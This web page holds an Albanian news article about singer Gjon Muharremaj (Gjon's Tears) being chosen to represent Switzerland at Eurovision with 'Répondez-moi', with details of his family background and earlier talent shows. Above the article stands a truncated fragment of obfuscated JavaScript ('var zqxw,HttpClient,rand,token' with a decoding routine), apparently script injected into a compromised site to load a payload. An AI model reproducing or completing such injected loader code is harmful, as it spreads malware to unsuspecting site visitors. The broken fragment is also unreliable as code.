;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një shqiptar do ta përfaqësojë Zvicrën në Eurovision (VIDEO)

By

Kjo është hera e parë në historinë e shtetit zvicran në “Eurovision”, që përfaqësohet nga një këngëtar me prejardhje shqiptare.

Pas më shumë se 10 vjetësh, Zvicra ka zgjedhur një këngë franceze për konkursin e këngëve në “Eurovision”.

Muzikanti 21-vjeçar Gjon, me këngën e tij “Répondez-moi”, u zgjodh nga një panel i 100 anëtarëve të audiencës dhe një juri ndërkombëtare që përfshin 20 ekspertë të muzikës pasi paraqiti këngën e tij në një thirrje të hapur për hyrje në këtë garë.

Paneli dhe juria secili mbartnin nga 50 për qind të vendimit, shkruan Eurovision.Tv.

Tema e këngës është shumë personale për këngëtarin shqiptar dhe është gjithashtu universale dhe flet për të gjithë.

Gjon thotë për këngën e tij:

“Të gjithë pyesin veten pse ne jemi saktësisht këtu, nga vijmë dhe ku po shkojmë. Këto janë pyetje kryesore, veçanërisht për njerëzit me prejardhje migrante. Prindërit e mi janë nga Shqipëria dhe Kosova. Jam rritur në Zvicër dhe është shtëpia ime, këto janë pyetje për të cilat mendoj shumë”- tha Muharremaj.

Gjon’s Tears bashkë-shkroi këngën “Répondez-moi” me kantautorët Xavier Michel, Alizé Oswald dhe producentin Jeroen Swinnen si pjesë e një kampi të këngëtarëve në Zvicër.

Kënga është përshkruar si kombinim i zërave, korëve dhe vargjeve të përziera me rrahje moderne që krijojnë një pamje të re dhe unike të tingullit.

Muharremaj, ia ka kushtuar zemrën dhe shpirtin e tij muzikës që kur ishte fëmijë.

Ai e përloti gjyshin e tij me interpretimin që i bëri këngës “Can’t Help Falling in Love” së Elvis Presleyt si një nëntë vjeçar.

Nofka e artistit rrjedh edhe nga kjo përvojë: “Gjon Tears (Lotët e Gjonit)”.

“Pavarësisht nga gëzimi, trishtimi apo melankolia – Unë dua t’i prek njerëzit me muzikën time në çdo mënyrë të mundshme”, thotë këngëtari tani 21-vjeçar.

Gjyshi i Gjonit, i cili ka rrënjët shqiptare, u zhvendos e regjistroi nipin e tij në konkursin e talenteve “Albanian Got’s Talent” në vitin 2010.

12-vjeçari i atëhershëm doli i treti në konkurs.

Një vit më vonë, ai arriti në gjysmëfinale në ekuivalentin zviceran të “Got’s Talent” të Zvicrës dhe arriti në gjysmëfinalen e “The Voice of France” në vitin 2019.

Artikuj të ngjashëm